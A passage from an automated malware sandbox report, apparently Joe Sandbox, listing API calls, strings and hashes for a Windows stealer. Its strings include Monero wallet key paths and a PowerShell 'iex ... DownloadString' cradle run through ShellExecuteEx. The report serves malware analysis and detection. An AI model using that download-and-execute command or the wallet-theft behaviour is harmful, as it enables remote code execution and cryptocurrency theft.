                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: d4bc8bc2152541406b436fa20dcbfee8e6601cbf5096995e29d202fbb6621b5e
                                • Instruction ID: b23b41f0420f8c62564f9014909cefeef622349f4d2afd09b62bf4e7c5504e62
                                • Opcode Fuzzy Hash: d4bc8bc2152541406b436fa20dcbfee8e6601cbf5096995e29d202fbb6621b5e
                                • Instruction Fuzzy Hash: 743107B4A00209EFDB14CF94C885BEE7BB5FF48750F108158E905A7390D778A941CFA1
                                APIs
                                • lstrcat.KERNEL32(?,007BDF38), ref: 008C47DB
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4801
                                • lstrcat.KERNEL32(?,?), ref: 008C4820
                                • lstrcat.KERNEL32(?,?), ref: 008C4834
                                • lstrcat.KERNEL32(?,007AB008), ref: 008C4847
                                • lstrcat.KERNEL32(?,?), ref: 008C485B
                                • lstrcat.KERNEL32(?,007BD420), ref: 008C486F
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8D90: GetFileAttributesA.KERNEL32(00000000,?,008B1B54,?,?,008D564C,?,?,008D0E1F), ref: 008C8D9F
                                  • Part of subcall function 008C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008C4580
                                  • Part of subcall function 008C4570: RtlAllocateHeap.NTDLL(00000000), ref: 008C4587
                                  • Part of subcall function 008C4570: wsprintfA.USER32 ref: 008C45A6
                                  • Part of subcall function 008C4570: FindFirstFileA.KERNEL32(?,?), ref: 008C45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 2972278f75ed11783c3103152eace31c2c0cf109a5f3f5895b68c78cf046292e
                                • Instruction ID: 7f8c787897dd6a20ffb2d70adaec8fa9e45391ac1170de68f63c50d5407aa9a9
                                • Opcode Fuzzy Hash: 2972278f75ed11783c3103152eace31c2c0cf109a5f3f5895b68c78cf046292e
                                • Instruction Fuzzy Hash: A2316DB2940208A7CB14FBE4DC85FE97378FB58700F404589B359D6081EEB4E68ACB92
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C2D85
                                Strings
                                • ')", xrefs: 008C2CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008C2D04
                                • <, xrefs: 008C2D39
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008C2CC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 024d9bb194c881dbfc8ed221d68366fb30d64e8f37e71021e01be5da8cb7bb24
                                • Instruction ID: ca416d8a0cef1569fc2d21db13cd15d217ec848ec6f4a665db748ab69f4e1d29
                                • Opcode Fuzzy Hash: 024d9bb194c881dbfc8ed221d68366fb30d64e8f37e71021e01be5da8cb7bb24
                                • Instruction Fuzzy Hash: 0941AA7181020C9BDB18EBA4D896FEDBB74FF14704F40412DE116EA192DF74AA4ACF96
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008B9F41
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: f318ede03c7213635e50086bed65f8032929fcf20df4e893a1b4aabf064102aa
                                • Instruction ID: 8bfce60ff66e59e60165875254115041cf442cfdf5de9af1e73c283031d3e373
                                • Opcode Fuzzy Hash: f318ede03c7213635e50086bed65f8032929fcf20df4e893a1b4aabf064102aa
                                • Instruction Fuzzy Hash: 2761CA71910248ABDB28EFA8DC96FED7775FF44344F408118E9099B291EB74AA06CB52
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 008C696C
                                • sscanf.NTDLL ref: 008C6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008C69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008C69C0
                                • ExitProcess.KERNEL32 ref: 008C69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 752782222654f4c65aa250116e2ed0642ccfc3b530278bde75054062b33ab3c3
                                • Instruction ID: fc2612a625293f8d4355162cc018cf306ffa95ce72153102374b710ade847548
                                • Opcode Fuzzy Hash: 752782222654f4c65aa250116e2ed0642ccfc3b530278bde75054062b33ab3c3
                                • Instruction Fuzzy Hash: B221BCB5D14208ABCF04EFE4D945AEEB7B5FF58300F04852EE40AE3250EB749619CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABAB0,00000000,00020119,?), ref: 008C7E5E
                                • RegQueryValueExA.ADVAPI32(?,007BD120,00000000,00000000,000000FF,000000FF), ref: 008C7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 008C7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0b0eb417b6fb29cd6950c05c753f4857915c523a028d04ce115e6d8de5d523d5
                                • Instruction ID: 49916c35717fbeb5a4a478913008fe0e58a1b64902cc0949d3d23a5a760fe4ae
                                • Opcode Fuzzy Hash: 0b0eb417b6fb29cd6950c05c753f4857915c523a028d04ce115e6d8de5d523d5
                                • Instruction Fuzzy Hash: 53113AB2A44209ABD700DBD4DD49FBBBBB8FB08B10F104259F619E7280D7B49801CBA1
                                APIs
                                • StrStrA.SHLWAPI(007BDE30,?,?,?,008C140C,?,007BDE30,00000000), ref: 008C926C
                                • lstrcpyn.KERNEL32(00AFAB88,007BDE30,007BDE30,?,008C140C,?,007BDE30), ref: 008C9290
                                • lstrlen.KERNEL32(?,?,008C140C,?,007BDE30), ref: 008C92A7
                                • wsprintfA.USER32 ref: 008C92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: dc051edb1b72c1bf3ce69f47719026479b852fb2a8b0fd5299a738cae231d1eb
                                • Instruction ID: fa1fa50a3c53d513870514a2948627216f101783893ca436611192b79e0ce3bf
                                • Opcode Fuzzy Hash: dc051edb1b72c1bf3ce69f47719026479b852fb2a8b0fd5299a738cae231d1eb
                                • Instruction Fuzzy Hash: 8E01A5B5500108FFCB04DFE8C988EEE7BB9FB58354F108548F9199B204D671AE41DB95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008B12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008B12F5
                                • RegCloseKey.ADVAPI32(?), ref: 008B12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: e60fede95dfff1b669ec4985a22323f7e93c9e4490446e2535ffdf23b1ae10cb
                                • Instruction ID: dae47a07f8f1cec66b81f89ceeac13e29c0818ccbfc23ee5023c2427bf8df915
                                • Opcode Fuzzy Hash: e60fede95dfff1b669ec4985a22323f7e93c9e4490446e2535ffdf23b1ae10cb
                                • Instruction Fuzzy Hash: A50112B9A40208BFDB00DFD0DC49FEEB7B8EB58701F008155FA09D7280D670AA01CB91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: f0f9a46256673c8abb85680dd7d95eb50ba7acadc7577f79bbe66a29c62005cb
                                • Instruction ID: 7a00f4700b7b45851111cd1a40eb5050f4f4f21cd457a21d199fbfd6491acfcf
                                • Opcode Fuzzy Hash: f0f9a46256673c8abb85680dd7d95eb50ba7acadc7577f79bbe66a29c62005cb
                                • Instruction Fuzzy Hash: F741D5B150079C5EDB218B248C85FFB7BF8FB45708F1444ACE98AC6182E271DA49CF60
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008C6663
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C6726
                                • ExitProcess.KERNEL32 ref: 008C6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: f0e8411726db6e8f6c410efce1320233c6f3a8671e5e27ef0949bf1850ab0b63
                                • Instruction ID: 0263404eadca100e845e568f8faa69e07dde6df8409b0151bf006b43bf9f5773
                                • Opcode Fuzzy Hash: f0e8411726db6e8f6c410efce1320233c6f3a8671e5e27ef0949bf1850ab0b63
                                • Instruction Fuzzy Hash: A7312DB1801218ABDB18EB94DC96FEDBB78FF14304F404199F209A6191DF74AB49CF5A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008D0E28,00000000,?), ref: 008C882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8836
                                • wsprintfA.USER32 ref: 008C8850
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: ce3f8ec7ff4cb7f7497745c1adb2e08ef47fa54ec6b04a1087ec7820f026ace8
                                • Instruction ID: f46db14b3c5f590acffff3b90d2137ad1cce7e200fb9e6f175dac7cbd38d8b6c
                                • Opcode Fuzzy Hash: ce3f8ec7ff4cb7f7497745c1adb2e08ef47fa54ec6b04a1087ec7820f026ace8
                                • Instruction Fuzzy Hash: 1321DBB1A44208ABDB04DFD4DD49FBEBBB8FB48751F104119F609A7680C7799901CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008C951E,00000000), ref: 008C8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8D62
                                • wsprintfW.USER32 ref: 008C8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: f9c1327474a188c63b32322f99d8a93ed8077716c1861b1059243882e3748b61
                                • Instruction ID: 354db4ba1fd58bfe12408bed367ac9d8aec8ada76768b0a8bd9afc7f3dc04668
                                • Opcode Fuzzy Hash: f9c1327474a188c63b32322f99d8a93ed8077716c1861b1059243882e3748b61
                                • Instruction Fuzzy Hash: 64E046B1A40208BBC700DBD4DC0AEA977A8EB04702F000194FD0987280DAB19A019B92
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 008BA3FF
                                • lstrlen.KERNEL32(00000000), ref: 008BA6BC
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 008BA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: ec0997d6806d68b0805412fb1260a2c6a144bbad6c5f7433927f9cae3fca69ef
                                • Instruction ID: 19fb6208cf645959d29d81201b6b5106e249a4f8ccef4fc1ef7a34279921fd1c
                                • Opcode Fuzzy Hash: ec0997d6806d68b0805412fb1260a2c6a144bbad6c5f7433927f9cae3fca69ef
                                • Instruction Fuzzy Hash: 46E1BD728101189BDB18EBA8DC96EEE7338FF14304F50816DF516E6191EE34AA49CB67
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BD481
                                • lstrlen.KERNEL32(00000000), ref: 008BD698
                                • lstrlen.KERNEL32(00000000), ref: 008BD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 008BD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: abf4ae2050162ad18c870d5222af9a8b9d115bac71b4b53a23415eb24e5f2cab
                                • Instruction ID: e2337ba7dce7ef16be62b1e77f1148b1509983a88ba4355a0a039d85cf345b08
                                • Opcode Fuzzy Hash: abf4ae2050162ad18c870d5222af9a8b9d115bac71b4b53a23415eb24e5f2cab
                                • Instruction Fuzzy Hash: 6291CC729101189BDB18EBA8EC96EEE7338FF14304F50416DF516E6191EF34AA09CB67
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
